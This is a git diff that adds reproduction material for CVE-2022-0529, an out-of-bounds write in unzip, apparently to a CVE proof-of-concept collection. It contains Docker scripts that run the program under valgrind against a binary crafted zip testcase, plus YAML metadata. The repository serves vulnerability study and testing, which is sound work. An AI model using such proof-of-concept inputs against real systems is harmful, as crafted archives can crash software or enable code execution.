+1,14 @@ +#!/bin/bash + +set -e + +IMAGE=unzip_bug_02-fedora +docker build -t $IMAGE -f Dockerfile-fedora . + +echo "[+] Running unzip /testcase" +docker run --rm -v $PWD/testcase:/testcase:ro \ + -it $IMAGE valgrind unzip /testcase || true + +echo "[+] Dropping into shell. Malformed input is located at /testcase" +docker run --rm -v $PWD/testcase:/testcase:ro \ + -it $IMAGE bash diff --git a/cve/unzip/2022/CVE-2022-0529/reproduce-ubuntu.sh b/cve/unzip/2022/CVE-2022-0529/reproduce-ubuntu.sh new file mode 100644 index 0000000000000000000000000000000000000000..f125afb936635a3dfa96052b67749e3d7876e427 --- /dev/null +++ b/cve/unzip/2022/CVE-2022-0529/reproduce-ubuntu.sh @@ -0,0 +1,14 @@ +#!/bin/bash + +set -e + +IMAGE=unzip_bug_02-ubuntu +docker build -t $IMAGE -f Dockerfile-ubuntu . + +echo "[+] Running unzip /testcase" +docker run --rm -v $PWD/testcase:/testcase:ro \ + -it $IMAGE valgrind unzip /testcase || true + +echo "[+] Dropping into shell. Malformed input is located at /testcase" +docker run --rm -v $PWD/testcase:/testcase:ro \ + -it $IMAGE bash diff --git a/cve/unzip/2022/CVE-2022-0529/testcase b/cve/unzip/2022/CVE-2022-0529/testcase new file mode 100644 index 0000000000000000000000000000000000000000..059d1d316d23f959d4c5ad525c505d4388802da5 Binary files /dev/null and b/cve/unzip/2022/CVE-2022-0529/testcase differ diff --git a/cve/unzip/2022/yaml/CVE-2022-0529.yaml b/cve/unzip/2022/yaml/CVE-2022-0529.yaml new file mode 100644 index 0000000000000000000000000000000000000000..7838180fd3dfd2778f7151668565783599f8887d --- /dev/null +++ b/cve/unzip/2022/yaml/CVE-2022-0529.yaml @@ -0,0 +1,19 @@ +id: CVE-2022-0529 +source: https://github.com/nanaao/unzip_poc/tree/main/CVE-2022-0529 +info: + name: Linux unzip命令用于解压缩zip文件。unzip为.zip压缩文件的解压缩程序。 + severity: MEDIUM + description: + A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string that leads to a heap of out-of-bound write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution. + scope-of-influence: + unzip Up to (excluding) 6.0-r11 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-0529 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H + cvss-score: 5.5 + cve-id: CVE-2022-0529 + cwe-id: CWE-787 + cnvd-id: None + kve-id: None + tags: CVE-2022, unzip \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index 516c3adcfb636c223957496aa015901a0b61ef07..0dd1d2866bef928185fbfd8a7dcce61c1f5d4e1f 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -22,4 +22,6 @@ cve: - CVE-2021-1056 java-spring-cloud-gateway: - CVE-2022-22947 + unzip: + - CVE-2022-0529 cnvd: